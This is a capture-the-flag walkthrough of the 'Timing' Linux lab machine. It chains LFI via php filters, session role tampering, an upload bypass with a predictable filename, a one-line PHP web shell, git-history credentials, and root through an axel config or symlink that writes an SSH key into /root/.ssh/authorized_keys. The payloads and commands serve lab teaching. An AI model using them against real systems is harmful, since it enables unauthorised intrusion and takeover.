Timing was a medium rated linux machine which involved fuzzing for files and finding LFI leading us to viewing source code of the application and logging into the admin panel by modifying the role parameter which had a functionality to upload image files only which can be easily by passed by just adding php extension before and through LFI we can read how the application was generating the hash name of the file allowing us to access the upload php file and executing it using php filter which gives us a web shell. In /opt directory an archive can be found which had git commits made giving us the password for aarron user to login through ssh which had permissions to run a custom binary, netutils as the root user.
NMAP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:5c:40:d7:c9:fe:ff:a8:83:c3:6e:cd:60:11:d2:eb (RSA)
| 256 18:c9:f7:b9:27:36:a1:16:59:23:35:84:34:31:b3:ad (ECDSA)
|_ 256 a2:2d:ee:db:4e:bf:f9:3f:8b:d4:cf:b4:12:d8:20:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Simple WebApp
|_Requested resource was ./login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPORT 80 (HTTP)
On the webserver we can see a login page
I couldn’t find anything else , tried a simple sqli but it didn’t worked , tried admin:admin and that didn't worked as well. Fuzzing for files with gobuster
Running gobuster with php extension
This gives us a file image.php , but on viewing that file it won't return anything as it's a php file so it's going to be executed
I then ran wfuzz to see if I can find any parameters and found img
wfuzz -c -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u "http://10.129.245.78/image.php?FUZZ=/etc/passwd" --hw 0so doing /etc/passwd on this parameter won't give us anything as it's blacklisted
So we can try to use php filters , here I used the decoder just to read the passwd file
Now we can read the php files as well
This was the source code image.php , let's look at login.php
It’s using db_conn.php so maybe it will have credentials
Checking the other php files there was a file named admin_auth_check which is checking if role is set to 1
<?phpinclude_once "auth_check.php";if (!isset($_SESSION['role']) || $_SESSION['role'] != 1) {
echo "No permission to access this panel!";
header('Location: ./index.php');
die();
}?>
But we can’t do anything from this point , so moving on ,we got a password from db file but it didn’t worked anywhere , from passwd file we have a user aaron , let's try to login with aaron:aaron
And luckily this worked , now we can see that we can update our profile
So let’s capture this request in burp suite and see what parameters are being set
This is making a POST request to profile_update.php , so let's see the source code through LFI
In the source code it’s taking a POST parameter role and adding it to our php session , we can change it to 1 to become admin
On refreshing the page we can see that we have access to admin panel
Foothold
Looking at the source code of upload.php , it's going to name the uploaded file by calculating md5 hash of a string having $file_hash (not the variable just a string) , concatenated with _ the md5 hash of this string will be calculated and at the end file name with extensions will be concatenated
So I copied the source code and added the filename shell.php.jpg which is the php file I created to bypass the file upload for php extension
<?php
$file_name = md5('$file_hash' . time()) . '_' . 'shell.php.jpg';
echo $file_name."\n";
?>and the contents of this php file are
<?php
system($_GET['cmd']);
?>Now we need to synchronize the with the target machine using timedatectl set-timezone UTC
In order to upload the file and know it’s name we need to keep running the php file and upload that file then pass those filenames that we got through the script to gobuster
We started to get hit on our uploaded file so we know the name of the file now
But it won’t execute our php file but remember that there was a php file image.php which had a LFI which was including a file through GET parameter so let's try to include that file with that
I later uploaded phpbash whch is an interactive php web shell
https://github.com/Arrexel/phpbash
Privilege Escalation (aaron)
Going into /opt folder we saw a back of the site in an archive
So let’s try to copy it to web’s root directory (/var/www/html)
Perfect, now we can easily request for this archive
Notice that we have a .git , so let's try to see commit made to this repository using git show
We get a second password, this lets us login as arron user
Privilege Escalation (root)
Doing sudo -l , aaron can run netutils as root user
And this isn’t really a binary , it’s a bash script that runs a jar file
But we can’t actually read it since it’s under /root directory and we don’t have permissions to read it , so on executing it we will have two options that we can use utilize , download file from ftp or from http
I provided the localhost because there’s web service running, result will saved in a file called default in the current directory as root user
We don’t know what it’s running to get this page , for that I uploaded pspy which is a process monitor
This tells us that it runs axel which is a file download accelerator for linux , I tried to look for exploits regarding this but there weren’t any, googling around I found a configuration file for axel which defines what should be the filename when a index page is downloaded
https://github.com/FiloSottile/axel/blob/master/axelrc.example
This part is commented ,so un comment and instead of default we change it to /root/authorized_keys file , it will now download the index.html page in that directory, let's generate a ssh key pair with ssh-keygen and rename our id_rsa.pub to index.html and transfer this config file on to this machine naming it .axelrc
Now logging in with the ssh key as the root user.
Method #2
Other way to get root is to make symlink to /root/.ssh/authorized_keys which is the source and you can name the symlink anything you want but make sure to download the filename as the symlink
ln -s /root/.ssh/authorized_keys/ abcNow hosting the file using apache or python3 and then just logging with ssh as root user.
